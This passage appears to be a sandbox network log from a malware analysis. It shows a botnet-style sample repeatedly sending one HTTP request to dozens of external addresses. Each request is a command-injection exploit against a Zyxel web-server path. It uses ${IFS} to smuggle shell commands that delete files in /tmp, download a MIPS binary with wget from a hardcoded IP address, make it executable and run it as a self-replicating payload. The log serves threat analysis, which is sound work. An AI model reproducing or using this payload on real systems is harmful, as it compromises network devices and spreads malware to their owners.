                                                        Jan 28, 2024 10:12:05.921056986 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        137192.168.2.145829675.169.81.165443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:05.921132088 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        138192.168.2.145994875.204.88.37443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:05.921212912 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        139192.168.2.1446416190.65.162.223443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:06.926201105 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        140192.168.2.1441232175.221.117.174443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:06.926315069 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        141192.168.2.145936844.27.237.168443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:06.926409960 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        142192.168.2.145553889.42.153.182443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:07.929794073 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        143192.168.2.143839038.104.196.178443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:07.929816008 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        144192.168.2.145249483.153.143.103443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:07.929838896 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        145192.168.2.144537054.214.57.171443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:07.929912090 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        146192.168.2.144351859.178.123.117443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:07.930136919 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        147192.168.2.1451842174.37.240.207443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:08.933449030 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        148192.168.2.1441416117.12.201.21443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:08.933478117 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        149192.168.2.1437122162.177.78.131443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:08.933517933 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        150192.168.2.145520484.12.97.253443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:08.933548927 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        151192.168.2.1436868194.155.20.197443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:08.933571100 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        152192.168.2.1452270145.10.80.213443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:08.933626890 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        153192.168.2.1433448136.66.136.12443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:08.933667898 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        154192.168.2.14365949.141.158.211443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:08.933723927 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        155192.168.2.1448488112.215.65.49443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:08.933758974 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        156192.168.2.143860850.161.74.210443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:08.933798075 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        157192.168.2.145057490.92.96.145443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:08.933845997 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        158192.168.2.143905674.223.229.7443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:08.933882952 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        159192.168.2.144121085.224.50.162443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:08.933990955 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        160192.168.2.144257825.171.169.108443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:09.938637972 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        161192.168.2.143577091.226.27.155443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:09.938693047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        162192.168.2.1456702187.78.38.122443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:09.938725948 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        163192.168.2.1437700122.119.211.148443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:09.938779116 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        164192.168.2.144606684.110.144.75443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:09.938807964 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        165192.168.2.144399292.44.157.79443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:09.938890934 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        166192.168.2.1434148134.22.17.119443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:09.938922882 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        167192.168.2.1451244156.34.37.104443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:09.939080000 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        168192.168.2.1448692155.225.53.189443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:09.939131021 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        169192.168.2.145428270.131.18.75443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:10.944253922 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        170192.168.2.144174482.219.110.76443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:10.944307089 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        171192.168.2.1436986175.168.236.135443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:10.944374084 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        172192.168.2.143403449.3.253.64443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:11.950014114 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        173192.168.2.143622463.46.214.45443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:11.950037003 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        174192.168.2.143365017.63.226.187443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:11.950074911 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        175192.168.2.1459948129.227.158.85443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:11.950165033 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        176192.168.2.143868459.142.8.213443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:11.950217009 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        177192.168.2.1448046156.58.57.84443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:11.950289965 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        178192.168.2.1455854142.208.174.146443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:11.950313091 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        179192.168.2.143616885.42.85.48443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:12.955081940 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        180192.168.2.1439280129.92.236.53443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:12.955148935 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        181192.168.2.1437528116.17.42.161443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:12.955245972 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        182192.168.2.1452914184.186.180.138443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:13.958030939 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        183192.168.2.1445198220.28.213.160443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:13.958122015 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        184192.168.2.1439942107.145.67.136443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:13.958147049 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        185192.168.2.143301618.0.139.66443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:13.958156109 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        186192.168.2.145371253.197.117.41443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:13.958215952 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        187192.168.2.143361854.223.23.243443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:13.958242893 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        188192.168.2.1458318154.210.10.196443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:13.958265066 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        189192.168.2.145346275.64.242.108443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:13.958288908 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        190192.168.2.1432802134.169.180.27443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:13.958301067 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        191192.168.2.144107084.179.189.254443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:13.958290100 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        192192.168.2.144440266.100.158.135443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:13.958477974 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        193192.168.2.1441346164.174.134.155443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:13.958522081 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        194192.168.2.1454302159.80.133.79443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:13.958586931 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        195192.168.2.1443970123.62.57.184443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:13.958587885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        196192.168.2.1445772114.143.101.152443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:13.958597898 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        197192.168.2.1458116194.24.5.148443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:14.963514090 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
